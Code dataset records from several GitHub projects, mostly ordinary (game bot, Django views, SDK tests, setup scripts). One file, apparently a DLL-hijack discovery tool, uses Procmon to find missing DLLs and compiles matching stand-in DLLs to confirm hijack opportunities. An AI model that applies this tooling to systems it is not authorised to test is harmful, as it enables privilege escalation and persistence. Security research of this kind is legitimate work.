home(self):\n try:\n return util.get_client(self.server_id).get_server(self.server_id).name\n except AttributeError:\n return \"Unknown\"\n\n\nclass ActiveQuest(Player, util.SlotPickleMixin):\n __slots__ = [\"level\", \"attack\", \"strg\", \"hp\",\n \"equipped\", \"q_id\", \"quester_id\", \"cash_iv\",\n \"quester\", \"accy\", \"exp\", \"total_exp\"]\n\n def __init__(self):\n pass # Use async factory method create instead\n\n @staticmethod\n async def create(q_id: str, quester: Player):\n # The base quest (holds the quest information)\n active_quest = ActiveQuest()\n active_quest.q_id = q_id\n base_quest = active_quest.info\n\n active_quest.name = base_quest.name\n\n active_quest.quester_id = quester.id\n active_quest.quester = quester\n\n \"\"\" The quests equipped items.\n Quests only have weapons but I may add more things a quest\n can have so a default dict will help with that \"\"\"\n active_quest.equipped = defaultdict(lambda: \"default\",\n weapon=base_quest.w_id)\n\n target_exp = random.uniform(quester.total_exp, quester.total_exp*1.8)\n active_quest.level = gamerules.get_level_from_exp(target_exp)\n active_quest.total_exp = active_quest.exp = 0\n await active_quest._calculate_stats()\n quester.quests.append(active_quest)\n quester.save()\n return active_quest\n\n async def _calculate_stats(self):\n base_attack, base_strg, base_accy, base_hp = tuple(base_value / 1.7 for base_value in\n self.info.base_values())\n self.attack = self.accy = self.strg = 1\n target_level = self.level\n self.level = 0\n self.hp = base_hp * target_level * random.uniform(0.6, 1)\n increment_scale = random.uniform(0.4, 1)\n while self.level < target_level:\n exp_next_level = gamerules.get_exp_for_next_level(self.level)\n increment = max(exp_next_level, 1000) * increment_scale / 600\n if self.exp >= exp_next_level:\n self.level += 1\n self.exp = 0\n self.progress(increment * random.uniform(0.6, 1),\n increment * random.uniform(0.6, 1),\n increment * random.uniform(0.6, 1),\n max_attr=math.inf,\n max_exp=math.inf)\n self.attack += -increment + increment * base_attack\n self.strg += -increment + increment * base_strg\n self.accy += -increment + increment * base_accy\n await asyncio.sleep(1 / 1000)\n self.cash_iv = min(self.info.base_values()) * 3 * random.uniform(0.8, 1.6)\n\n def get_avatar_url(self, *args):\n quest_info = self.info\n if quest_info is not None:\n return quest_info.image_url\n\n def get_reward(self):\n base_reward = self.cash_iv * self.level\n return max(1, int(base_reward + base_reward * (self.get_quest_scale() + 1) * 10))\n\n def get_quest_scale(self):\n avg_stats = self.get_avg_stat()\n quest_weapon = self.weapon\n quester_weapon = self.quester.weapon\n hp_difference = (self.hp - self.quester.hp) / self.hp / 10\n stat_difference = (avg_stats - self.quester.get_avg_stat()) / avg_stats\n weapon_damage_difference = (quest_weapon.damage - quester_weapon.damage) / quest_weapon.damage\n weapon_accy_difference = (quest_weapon.accy - quester_weapon.accy) / quest_weapon.accy\n return (stat_difference * 10 + weapon_damage_difference\n / 3 + weapon_accy_difference * 5 + hp_difference * 5) / 20\n\n def get_threat_level(self, player):\n return [\n player.attack / max(player.attack, self.attack),\n player.strg / max(player.strg, self.strg),\n player.accy / max(player.accy, self.accy),\n self.money / max(player.money, self.money),\n player.weapon.damage / max(player.weapon.damage, self.weapon.damage)\n ]\n\n @property\n def money(self):\n return self.get_reward()\n\n @money.setter\n def money(self, value):\n pass\n\n @property\n def info(self):\n return quest_map[self.q_id]\n\n def save(self):\n pass\n\n def __setstate__(self, object_state):\n SlotPickleMixin.__setstate__(self, object_state)\n \"\"\" quester is set in the player's setstate\n as quests are part of the player's save.\n Also we don't want to inherit the Player setstate.\n \"\"\"\n self.equipped = defaultdict(self.DEFAULT_FACTORIES[\"equipped\"], **self.equipped)\n\n def __getstate__(self):\n object_state = SlotPickleMixin.__getstate__(self)\n del object_state[\"quester\"]\n object_state[\"equipped\"] = dict(object_state[\"equipped\"])\n return object_state\n\n\ndef get_server_quest_list(server: discord.Server) -> Dict[str, Quest]:\n return quest_map[server]\n\n\ndef get_quest_on_server(server: discord.Server, quest_name: str) -> Quest:\n return quest_map[server.id + \"/\" + quest_name.lower()]\n\n\ndef remove_quest_from_server(server: discord.Server, quest_name: str):\n quest_id = server.id + \"/\" + quest_name.lower()\n del quest_map[quest_id]\n dbconn.get_collection_for_object(Quest).remove({'_id': quest_id})\n\n\ndef get_quest_from_id(quest_id: str) -> Quest:\n return quest_map[quest_id]\n\n\ndef get_channel_quests(channel: discord.Channel) -> List[Quest]:\n return [quest for quest in quest_map[channel.server].values() if quest.channel in (\"ALL\", channel.id)]\n\n\ndef get_random_quest_in_channel(channel):\n if channel.server in quest_map:\n return random.choice(get_channel_quests(channel))\n\n\ndef add_default_quest_to_server(server):\n default = random.choice(list(quest_map[\"DEFAULT\"].values()))\n Quest(default.name,\n default.base_attack,\n default.base_strg,\n default.base_accy,\n default.base_hp,\n task=default.task,\n weapon_id=default.w_id,\n image_url=default.image_url,\n spawn_chance=default.spawn_chance * 100,\n server_id=server.id,\n no_save=True)\n\n\ndef remove_all_quests(server):\n if server in quest_map:\n result = dbconn.delete_objects(Quest, '%s/.*' % server.id)\n del quest_map[server]\n return result.deleted_count\n return 0\n\n\ndef has_quests(place):\n if isinstance(place, discord.Server):\n return place in quest_map and len(quest_map[place]) > 0\n elif isinstance(place, discord.Channel):\n if place.server in quest_map:\n return len(get_channel_quests(place)) > 0\n return False\n\n\nREFERENCE_QUEST = Quest('Reference', 1, 1, 1, 1, server_id=\"\", no_save=True)\n\n\ndef _load():\n def load_default_quests():\n with open('dueutil/game/configs/defaultquests.json') as defaults_file:\n defaults = json.load(defaults_file)\n for quest_data in defaults.values():\n Quest(quest_data[\"name\"],\n quest_data[\"baseAttack\"],\n quest_data[\"baseStrg\"],\n quest_data[\"baseAccy\"],\n quest_data[\"baseHP\"],\n task=quest_data[\"task\"],\n weapon_id=weapons.stock_weapon(quest_data[\"weapon\"]),\n image_url=quest_data[\"image\"],\n spawn_chance=quest_data[\"spawnChance\"],\n no_save=True)\n\n load_default_quests()\n\n for quest in dbconn.get_collection_for_object(Quest).find():\n loaded_quest = jsonpickle.decode(quest['data'])\n quest_map[loaded_quest.id] = util.load_and_update(REFERENCE_QUEST, loaded_quest)\n util.logger.info(\"Loaded %s quests\", len(quest_map))\n\n\n_load()\n","repo_name":"DueUtil/DueUtil","sub_path":"dueutil/game/quests.py","file_name":"quests.py","file_ext":"py","file_size_in_byte":11712,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"94"} +{"seq_id":"14499331101","text":"import setuptools\nimport shutil\nimport os\n\nown_dir = os.path.abspath(os.path.dirname(__file__))\n\n\ndef requirements():\n yield f'gardener-cicd-libs=={version()}'\n yield f'gardener-cicd-dso=={version()}'\n\n\ndef modules():\n return []\n return [\n os.path.basename(os.path.splitext(module)[0]) for module in\n os.scandir(path=own_dir)\n if module.is_file() and module.name.endswith('.py')\n ]\n\n\ndef version():\n d = own_dir\n while True:\n candidate = os.path.join(d, 'VERSION')\n if os.path.isfile(candidate):\n with open(candidate) as f:\n return f.read().strip()\n d = os.path.abspath(os.path.join(d, os.pardir))\n raise RuntimeError(f'did not find VERSION file in {own_dir} and all pardirs')\n\n\n# cp scripts\nsrc_bin_dir = os.path.join(own_dir, os.pardir, 'bin')\ntgt_bin_dir = os.path.join(own_dir, 'bin')\nshutil.copytree(src_bin_dir, tgt_bin_dir)\n\n\nsetuptools.setup(\n name='gardener-cicd-cli',\n version=version(),\n description='Gardener CI/CD Command Line Interface',\n python_requires='>=3.10',\n py_modules=modules(),\n packages=setuptools.find_packages(),\n install_requires=list(requirements()),\n scripts=[os.path.join(tgt_bin_dir, 'purge_history')],\n entry_points={\n 'console_scripts': [\n 'gardener-ci = gardener_ci.cli_gen:main',\n 'cli.py = gardener_ci.cli_gen:main', # XXX backwards-compatibilty - rm this\n 'yaml2json = gardener_ci.yaml2json:main'\n ],\n },\n)\n","repo_name":"gardener/cc-utils","sub_path":"cli/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"94"} +{"seq_id":"13286501557","text":"\"\"\"Manipulate MAME ini files\"\"\"\n# Lutris Modules\nfrom lutris.util.system import path_exists\n\n\nclass MameIni:\n\n \"\"\"Looks like an ini file and yet it is not one!\"\"\"\n\n def __init__(self, ini_path):\n if not path_exists(ini_path):\n raise OSError(\"File %s does not exist\" % ini_path)\n self.ini_path = ini_path\n self.lines = []\n self.config = {}\n\n def parse(self, line):\n \"\"\"Store configuration value from a line\"\"\"\n line = line.strip()\n if not line or line.startswith(\"#\"):\n return None, None\n key, *_value = line.split(maxsplit=1)\n if _value:\n return key, _value[0]\n return key, None\n\n def read(self):\n \"\"\"Reads the content of the ini file\"\"\"\n with open(self.ini_path, \"r\", encoding='utf-8') as ini_file:\n for line in ini_file.readlines():\n self.lines.append(line)\n print(line)\n config_key, config_value = self.parse(line)\n if config_key:\n self.config[config_key] = config_value\n\n def write(self):\n \"\"\"Writes the file to disk\"\"\"\n with open(self.ini_path, \"w\", encoding='utf-8') as ini_file:\n for line in self.lines:\n config_key, _value = self.parse(line)\n if config_key and self.config[config_key]:\n ini_file.write(\"%-26s%s\\n\" % (config_key, self.config[config_key]))\n elif config_key:\n ini_file.write(\"%s\\n\" % config_key)\n else:\n ini_file.write(line)\n","repo_name":"lutris/lutris","sub_path":"lutris/util/mame/ini.py","file_name":"ini.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":6962,"dataset":"github-code","pt":"94"} +{"seq_id":"15277053215","text":"#!/usr/bin/env python\r\n\r\n\"\"\"\r\nModule Docstring\r\n\"\"\"\r\n\r\nfrom http.server import executable\r\nfrom importlib.resources import path\r\nfrom os import makedirs\r\nfrom os.path import basename, isfile, join\r\nfrom re import sub\r\nfrom shutil import copyfile\r\n\r\nfrom logzero import DEBUG, logfile, logger, loglevel\r\nfrom pandas import DataFrame\r\nfrom core.compile import Compile\r\nfrom utils.generic import to_text_file\r\nfrom tqdm import tqdm\r\n\r\nfrom config import settings\r\nfrom core.monitor import FileWatcher\r\nfrom core.pe import ExtractPE\r\nfrom core.pmc import Procmon\r\nfrom core.strings import Strings\r\nfrom utils.argparse import argument_parser\r\nfrom utils.datasets import Dataset\r\nfrom utils.generic import (list_to_file, mkdir, path_to_file, to_df_csv,\r\n uniquify, search_extensions)\r\n\r\nimport pandas as pd\r\nimport operator\r\n\r\nlogfile(settings.LOG_FILE, maxBytes=settings.LOG_MAX_BYTES, backupCount=settings.LOG_BACKUP_COUNT)\r\nloglevel(settings.LOG_LEVEL)\r\n\r\nlogger.info(f\"Log are stored in: {settings.LOG_FILE}\")\r\n\r\ndef setup():\r\n args = argument_parser()\r\n if args.debug or settings.DEBUG_MODE:\r\n settings.DEBUG_MODE = True\r\n loglevel(DEBUG)\r\n logger.debug(\"Logger set to DEBUG\")\r\n\r\n # Make an unique output dir to prevent overwriting previous monitors\r\n app_outdir = mkdir(join(settings.OUTPUT_DIR, args.appname))\r\n\r\n if args.command == \"monitor\":\r\n logger.info(\"Entering monitor mode\")\r\n with FileWatcher(args.directory) as fw:\r\n fw.run()\r\n csvfile = to_df_csv(fw.__str__(), outdir, \"raw_monitoring_data\")\r\n\r\n with Dataset(csvfile) as ds:\r\n ds.overview()\r\n ds.dedupe_and_sort(key=\"fullpath\")\r\n ext_dict = ds.export_extension_lists(outdir)\r\n\r\n elif args.command == \"analyse\":\r\n logger.info(\"Entering analyse mode\")\r\n # for ext, fullpaths in ext_dict.items():\r\n # if ext.lower() == \"exe\":\r\n\r\n logger.warning(f\"Press CTRL+C to stop\")\r\n # install_dir = \"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\\"\r\n install_dir = args.installdir\r\n findings = []\r\n try: \r\n # Do this action ones at the very end (It take dayysssss) \r\n with ExtractPE(app_outdir) as ePE:\r\n if ePE.check_cache():\r\n logger.debug(\"Loading exports from cache\")\r\n dll_entries = ePE.load_cache()\r\n else: \r\n subfolders, libraries = search_extensions(install_dir, [\".dll\"])\r\n logger.info(f\"Found {len(libraries)} libraries in installation directory {install_dir}\")\r\n logger.info(\"Retrieving all export entries, this might take a while...\")\r\n dll_entries = ePE.list_exports(list(libraries))\r\n\r\n _, executables = search_extensions(install_dir, [\".exe\"])\r\n logger.info(f\"Found {len(executables)} executables in installation directory {install_dir}\")\r\n logger.info(\r\nf\"\"\"\r\nAutomated steps to discover potential DLL hijacks. Testing {len(executables)} items!!\r\n 1) Validate file \r\n 2) Generate Procmon filter\r\n 3) Copy the file to a temporary folder.\r\n 4) Open Procmon and apply the customized filter.\r\n 5) Run the applications.\r\n 6) Close Procmon and save the results.\r\n\"\"\")\r\n\r\n \r\n for target in executables:\r\n\r\n summary = {}\r\n # Executable filename.\r\n filename = path_to_file(target)\r\n\r\n if not isfile(target):\r\n logger.warning(f\"Skip: {target}\")\r\n continue\r\n if any(xs in target for xs in settings.SKIP_LIST):\r\n logger.warning(f\"Skip: {target}\")\r\n continue\r\n\r\n summary_outfile = join(app_outdir, filename, \"summary.csv\")\r\n if isfile(summary_outfile):\r\n continue\r\n\r\n # Executable custom outdir\r\n outdir = mkdir(uniquify(join(app_outdir, filename)))\r\n\r\n # Full path name of executable in custom outdir \r\n tmp_executable = join(outdir, filename)\r\n try:\r\n copyfile(target, tmp_executable)\r\n except PermissionError:\r\n continue\r\n\r\n summary.update(file=target)\r\n \r\n # with Strings(outdir) as strings:\r\n # summary.update(autoElevate=strings.find_elevated(target)) \r\n # summary.update(autoElevate=False)\r\n\r\n with Procmon(outdir) as pm: \r\n # Generate Procmon Filter\r\n filter = pm.generate_filter(tmp_executable)\r\n\r\n # The (filtered) CSV file with loaded DLL's in current directory \r\n procmon_output, df = pm.run(tmp_executable, filter)\r\n \r\n # Storing DLL paths located in the installation folder\r\n matching_files = []\r\n # Load CSV file containing the unloaded DLL's\r\n # df = pd.read_csv(procmon_output)\r\n # List all missing DLL's\r\n missing_dlls = [path_to_file(path.lower()) for path in df.Path.tolist()]\r\n summary.update(potentials=df.Path.tolist())\r\n \r\n # Match missing DLL's with a existing DLL located in the Install directory (based on name)\r\n for dll in dll_entries:\r\n low_fname = path_to_file(dll[\"file\"].lower())\r\n # The DLL is relevant as it is missing by the executables\r\n if low_fname in missing_dlls:\r\n # Do not add the same DLL twice if it is located in different directories.\r\n get_value = operator.itemgetter('file')\r\n files = map(get_value, matching_files)\r\n if not low_fname in '\\t'.join(list(files)):\r\n # Add if not listed yet\r\n matching_files.append(dll)\r\n\r\n summary.update(matches=matching_files)\r\n\r\n with Compile(outdir) as cp:\r\n # Store the potential successes\r\n potential_hijacks = []\r\n\r\n # variables stores 3 this\r\n # file: DLL fullpath and a tuple (dll export function, ordinal)\r\n for variables in matching_files:\r\n # Creating C code file and def code file with jinja2\r\n c_file, def_file = cp.setup(variables)\r\n # Compile time! Returns a filename is DLL is created without errors, None is failed\r\n compiled_dll = cp.build(variables[\"file\"], c_file, def_file)\r\n # Only append successfull builds ;-)\r\n if compiled_dll != None: \r\n potential_hijacks.append(compiled_dll)\r\n\r\n # logger.info(f\"{len(potential_hijacks)} potential DLL hijack is discovered {path_to_file(target)} : {potential_hijacks}\")\r\n summary.update(hijacks=potential_hijacks)\r\n to_text_file(summary, summary_outfile)\r\n\r\n findings.append(summary)\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n DataFrame.from_dict(findings, orient=\"index\").to_csv(join(outdir, \"results.txt\"))\r\n to_text_file(join(outdir, \"results.txt\"), findings)\r\n # if ext.lower() != 'dll' and ext.lower() != 'exe':\r\n # app_outdir = mkdir(join(outdir, ext))\r\n # fname = join(app_outdir, ext)\r\n # list_to_file(fullpaths, fname)\r\n else:\r\n logger.warning(\"Required command not found, check --help for more info.\")\r\n \r\nif __name__ == \"__main__\":\r\n try:\r\n setup()\r\n except KeyboardInterrupt:\r\n logger.exception(\"Keyboard interrupt\")\r\n pass\r\n logger.info(f\"Exit gracefully\") \r\n","repo_name":"MrPineMan/HijackDiscovery","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33180697840","text":"\"\"\"\nthe View Model for trade info\n\"\"\"\nfrom app.view_models.book import BookViewModel\n\n\nclass TradeInfo:\n def __init__(self, goods):\n self.total = 0\n self.trades = []\n self.__parse(goods)\n\n def __parse(self, goods):\n self.total = len(goods)\n self.trades = [self.__map_to_trade(single) for single in goods]\n\n def __map_to_trade(self, single):\n time = single.create_datetime.strftime('%Y-%m-%d') if single.create_datetime else '未知'\n return dict(\n user_name=single.user.nickname,\n time=time,\n id=single.id\n )\n\n\nclass MyTrades:\n \"\"\"\n the base view model for my gifts or my wishes\n \"\"\"\n\n def __init__(self, trades_of_mine, re_trades_count_list):\n self.trades = []\n\n self.__trades_of_mine = trades_of_mine\n self.__re_trades_count_list = re_trades_count_list\n self.trades = self.__parse()\n\n def __parse(self):\n temp_trades = []\n for trade in self.__trades_of_mine:\n my_trade = self.__matching(trade)\n temp_trades.append(my_trade)\n return temp_trades\n\n def __matching(self, trade):\n count = 0\n for re_trade_count in self.__re_trades_count_list:\n if trade.isbn == re_trade_count['isbn']:\n count = re_trade_count['count']\n r = {\n 're_trades_count': count,\n 'book': BookViewModel(trade.book),\n 'id': trade.id\n }\n return r\n","repo_name":"shenghuntianlang/Fisher","sub_path":"app/view_models/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8457365220","text":"# 리스트 복사\na = [1, 2, 3]\nb = a\n\n# print(id(a)) # id: 변수가 가리키고 있는 객제의 주소 값 리턴\n# print(id(b))\n# print(a is b) # is: 동일한 객체를 가리키고 있는지 판단\n\na[1] = 4\n# print(a)\n# print(b)\n\n# a 변수의 값을 가져오면서 다른 주소를 가리키도록 하는 방법\n# 1. [:]이용\na = [1, 2, 3]\nb = a[:]\n# print(id(a))\n# print(id(b))\n\n# 2. copy 모듈 이용\nfrom copy import copy\na = [1, 2, 3]\nb = copy(a)\n# print(a is b) # False\n\n# 변수를 만드는 여러가지 방법\na, b = ('python', 'life')\nprint(a) # python (str)\nprint(b) # life (str)\n\n(a, b) = 'python', 'life'\n","repo_name":"junmin98/JumpToPython_practice","sub_path":"chap2/02-8_variable.py","file_name":"02-8_variable.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"15316316379","text":"import json\nimport random\nimport unittest\nimport uuid\nfrom time import sleep\n\nfrom forge_sdk import ForgeConn\nfrom forge_sdk import utils\nfrom forge_sdk.protos import protos\nfrom test.lib import validate_response\n\nSLEEP_SECS = 1\nforge = ForgeConn('127.0.0.1:27210')\nrpc = forge.rpc\n\n\ndef verify_tx_response(response):\n if response.code == 0 and response.hash is not None:\n return True\n else:\n return False\n\n\nclass HelperRPCTest(unittest.TestCase):\n\n def setUp(self):\n self.wallet_type = protos.WalletType(pk=0, hash=1, address=1)\n self.alice = self.init_wallet('alice')\n self.mike = self.init_wallet('mike')\n self.trans_tx = utils.build_transfer_itx(to=self.alice.wallet.address,\n value=2)\n\n def init_wallet(self, moniker):\n res = rpc.create_wallet(\n wallet_type=self.wallet_type,\n moniker=moniker,\n passphrase='abc123',\n )\n return res\n\n def test_build_tx(self):\n nonce = random.randrange(1, 100)\n forge_built_tx = rpc.create_tx(self.trans_tx,\n self.alice.wallet.address,\n self.alice.wallet,\n self.alice.token,\n nonce=nonce)\n\n built_tx_1 = rpc.build_signed_tx(\n itx=self.trans_tx, wallet=self.alice.wallet,\n token=self.alice.token, nonce=nonce)\n\n built_tx_2 = rpc.build_signed_tx(itx=self.trans_tx,\n wallet=self.alice.wallet,\n nonce=nonce)\n\n assert forge_built_tx.tx.signature == built_tx_2.signature\n assert forge_built_tx.tx.signature == built_tx_1.signature\n\n @validate_response\n def test_send_transfer_tx(self):\n tx = rpc.build_signed_tx(itx=self.trans_tx, wallet=self.mike.wallet)\n res = rpc.send_tx(tx)\n return res\n\n def test_send_exchange_tx(self):\n res, asset_address = rpc.create_asset(type_url='test',\n asset=str(uuid.uuid1()),\n wallet=self.alice.wallet)\n assert utils.is_response_ok(res)\n sleep(5)\n asset = rpc.get_single_asset_state(asset_address)\n\n print('hash', res.hash)\n print('issuer', asset.issuer)\n print('alice', self.alice.wallet.address)\n\n assert (asset.issuer == self.alice.wallet.address)\n sender_info = protos.ExchangeInfo(assets=[asset_address])\n receiver_info = protos.ExchangeInfo(value=utils.int_to_biguint(10))\n exchange_tx = protos.ExchangeTx(sender=sender_info,\n receiver=receiver_info)\n tx = rpc.prepare_exchange(exchange_tx=exchange_tx,\n wallet=self.alice.wallet)\n tx = rpc.finalize_exchange(tx, self.mike.wallet)\n res = rpc.send_tx(tx)\n assert utils.is_response_ok(res)\n\n def test_asset_factory(self):\n # create asset_factory\n template = json.dumps({\n \"row\": \"{{ row }}\",\n \"seat\": \"{{ seat }}\",\n \"room\": \"5C\",\n \"time\": \"11:00am 04/30/2019\",\n \"name\": \"Avengers: Endgame\"\n })\n asset_attributes = protos.AssetAttributes(\n transferrable=True,\n ttl=3600,\n )\n\n factory = protos.AssetFactory(\n description='movie ticket factory' + str(uuid.uuid1()),\n limit=20,\n price=utils.value_to_biguint(5),\n template=template,\n allowed_spec_args=['row', 'seat'],\n asset_name='TestTicket',\n attributes=asset_attributes\n )\n\n res, factory_address = rpc.create_asset_factory(moniker='test_factory',\n asset=factory,\n wallet=self.alice.wallet)\n assert utils.is_response_ok(res)\n\n # send acquireAssetTx\n sleep(5)\n factory_state = rpc.get_single_asset_state(factory_address)\n assert factory_state.issuer == self.alice.wallet.address\n mike_original_balance = rpc.get_account_balance(\n self.mike.wallet.address)\n\n spec_datas = [{'row': '1', 'seat': str(uuid.uuid1())}, {\n 'row': '2', 'seat': str(uuid.uuid4())}]\n res, tickets = rpc.acquire_asset(to=factory_address,\n spec_datas=spec_datas,\n type_url='fg:x:test_ticket',\n proto_lib=protos,\n wallet=self.mike.wallet)\n print('tickets', tickets)\n assert res.code == 0\n assert len(tickets) == len(spec_datas)\n sleep(6)\n for ticket in tickets:\n res = rpc.get_single_asset_state(ticket)\n assert res\n assert res.issuer == self.alice.wallet.address\n assert res.owner == self.mike.wallet.address\n\n mike_new_balance = rpc.get_account_balance(self.mike.wallet.address)\n assert (mike_original_balance -\n mike_new_balance) == utils.to_unit(5) * 2\n","repo_name":"ArcBlock/forge-python-sdk","sub_path":"test/integration/advanced.py","file_name":"advanced.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"36929576069","text":"from django.shortcuts import render, redirect\nfrom django.urls.base import reverse\nfrom .models import News, Category\nfrom .forms import NewsForm, CategoryForm\n\ndef main_page(request):\n eng_news = News.objects.filter().order_by(\"-views\")\n search = request.GET.get(\"soz\", None)\n if request.method == \"GET\" and search != None :\n news = News.objects.filter(titele__contains=search).order_by(\"-id\")\n context = { \n \"news\":news,\n \"eng_kop\": eng_news\n }\n return render(request, \"index.html\", context)\n else:\n news = News.objects.all().order_by(\"-id\")\n context = { \n \"news\":news,\n \"eng_kop\": eng_news\n }\n return render(request, \"index.html\", context)\n\ndef category_page(request, cat_id):\n news = News.objects.filter(category=cat_id)\n context = { \n \"news\":news\n }\n return render(request, \"index.html\", context)\n\ndef batafsil_page(request, id):\n news = News.objects.get(id=id)\n news.views+=1\n news.save()\n context = {\n \"news\": news, \n }\n return render(request, \"batafsil.html\", context)\n\ndef add_news_page(request):\n form = NewsForm()\n if request.method == \"POST\":\n form = NewsForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect(reverse(\"home-page\"))\n context = {\n \"form\": form\n } \n return render(request, \"add_news.html\", context)\n\ndef add_category(request):\n form = CategoryForm()\n if request.method == \"POST\":\n form = CategoryForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect(reverse(\"home-page\"))\n context = {\n \"form\": form\n } \n return render(request, \"add_category.html\", context)\n\ndef admin_page(request):\n news = News.objects.filter()\n context = {\n \"news\": news\n }\n return render(request, \"admin.html\", context)\n\ndef del_news(request, news_id):\n news = News.objects.get(id=news_id)\n if news:\n news.delete()\n return redirect(reverse(\"admin-page\"))\n\ndef news_holati(request, news_id):\n news = News.objects.get(id=news_id)\n if news_id and news.holati==True:\n news.holati = False\n news.save()\n elif news_id and news.holati==False:\n news.holati = True\n news.save()\n return redirect(reverse(\"admin-page\"))\n","repo_name":"akbarmuminjanov/News","sub_path":"test_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17552693608","text":"import time\n\nimport cv2\n\nfrom SensorModule import SensorModule\nfrom EmotionModule import EmotionModule\nfrom ResponseModule import ResponseModule\nfrom ActionModule import ActionModule\n\nimport ArduinoCommunicator\n\nimport sys\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport os\n\nimport logging\n\n# video\n#VIDEO_FEED = os.path.expanduser('~/Desktop/ishaanMovies/people gesturing-converted.mp4')\n#VIDEO_FEED = os.path.expanduser('~/Desktop/ishaanMovies/morePeople-converted.mp4')\n# camera\nFRONT_CAMERA = 0\nBACK_CAMERA = 1\n\nTEST_WIHOUT_RASP = False\n\nclass AppRun(QWidget):\n\n def __init__(self, realRun=None):\n super(AppRun, self).__init__()\n self.setWindowTitle('Cat\\'s Cradle')\n self.move(0, 0)\n self.realRun = realRun\n\n self.loadingDialog = None\n\n closeBtn = QPushButton('Stop CatsCradle')\n closeBtn.clicked.connect(self.initShutdown)\n layout = QGridLayout(self)\n layout.addWidget(closeBtn, 1, 1)\n\n self.setupStep = 0\n\n def closeEvent(self, event):\n self.initShutdown()\n event.accept() # let the window close\n\n def setup(self):\n # Raise message boxes to make sure the user properly sets the marionette\n # before running the AI\n setupDialog = QMessageBox()\n setupDialog.setText(\"Cat's Cradle Setup\")\n setupDialog.setStandardButtons(QMessageBox.Ok | QMessageBox.Close)\n setupDialog.setDefaultButton(QMessageBox.Ok)\n\n setupDialog.setInformativeText(\"Power on Raspberry Pi, \\nwait 1 minute\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n if not TEST_WIHOUT_RASP:\n # Wait for 60\n delay = 60\n if \"--testUI\" in sys.argv:\n delay = 5\n progress = QProgressDialog(\"Starting Raspberry Pi...\", None, 0, delay)\n progress.setWindowModality(Qt.WindowModal)\n\n for i in range(0, delay):\n progress.setValue(i)\n if (progress.wasCanceled()):\n return False\n time.sleep(1)\n\n progress.setValue(delay);\n\n # Try port connection and warn user if failed\n self.ac = ArduinoCommunicator.ArduinoCommunicator(\"/dev/ttyUSB0\")\n if self.ac.serial_port is None:\n errorDialog = QMessageBox()\n errorDialog.setText(\"ERROR\")\n errorDialog.setIcon(QMessageBox.Critical)\n errorDialog.setInformativeText(\"Port not found.\\nMake sure the Raspberry Pi is connected to the right port\\n\")\n errorDialog.setStandardButtons(QMessageBox.Ok)\n errorDialog.setDefaultButton(QMessageBox.Ok)\n errorDialog.exec_()\n if not \"--testUI\" in sys.argv:\n return False\n\n self.setupStep = 1\n\n setupDialog.setInformativeText(\"If necessary, plug main camera into battery\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n self.setupStep = 2\n\n setupDialog.setInformativeText(\"Power on motors and rear camera\\n\");\n ret = setupDialog.exec_();\n if ret == QMessageBox.Close:\n return False\n\n self.setupStep = 3\n\n return True\n\n\n def initShutdown(self):\n if self.realRun:\n self.realRun.stop()\n\n\n def shutdown(self):\n # Raise message boxes to make sure the user properly shuts down the marionette\n shutdownDialog = QMessageBox()\n shutdownDialog.setText(\"Cat's Cradle Shutdown\")\n shutdownDialog.setStandardButtons(QMessageBox.Ok)\n shutdownDialog.setDefaultButton(QMessageBox.Ok)\n\n if self.setupStep > 2:\n shutdownDialog.setInformativeText(\"Turn Off Motors\\n\")\n shutdownDialog.exec_()\n\n if self.setupStep > 0:\n shutdownDialog.setInformativeText(\"Turn Off Rasberry Pi\\n\")\n shutdownDialog.exec_()\n\n def checkCameras(self):\n # load the cameras\n front_camera = cv2.VideoCapture(FRONT_CAMERA)\n back_camera = cv2.VideoCapture(BACK_CAMERA)\n\n # test cameras and warn user if one is missing\n retFont, frame = front_camera.read()\n retBack, frame = back_camera.read()\n\n # release the cameras\n if front_camera:\n front_camera.release()\n if back_camera:\n back_camera.release()\n\n msg = \"\"\n result = True\n if not retFont:\n msg = \"The front camera is not connected. The application will not be launched.\"\n result = False\n elif not retBack:\n msg = \"The back camera is not connected. The application will be launched without the back camera.\"\n\n if msg is not \"\":\n cameraDialog = QMessageBox()\n cameraDialog.setText(\"ERROR\")\n cameraDialog.setStandardButtons(QMessageBox.Ok)\n cameraDialog.setDefaultButton(QMessageBox.Ok)\n\n cameraDialog.setInformativeText(msg)\n cameraDialog.exec_()\n\n return result\n\n\nclass RunCatsCradle(object):\n def __init__(self, returnToZero=True, app=None):\n self.app = app\n self.returnToZero = returnToZero\n self.running = False\n\n def run(self):\n self.running = True\n\n logging.basicConfig(filename='interactions.log', level=logging.INFO)\n # comment this line to enable logging\n logging.disable(logging.INFO)\n logging.info(str(time.time()) + ' started.')\n\n cameraMaxX = 1920\n cameraMaxY = 1080\n\n actionModule = ActionModule(cameraMaxX, cameraMaxY, dummy=\"--dummyAction\" in sys.argv)\n\n print('Loaded Action Module...\\n')\n\n response_module = ResponseModule(actionModule)\n\n print('Loaded Response Module...\\n')\n\n emotion_module = EmotionModule(response_module, 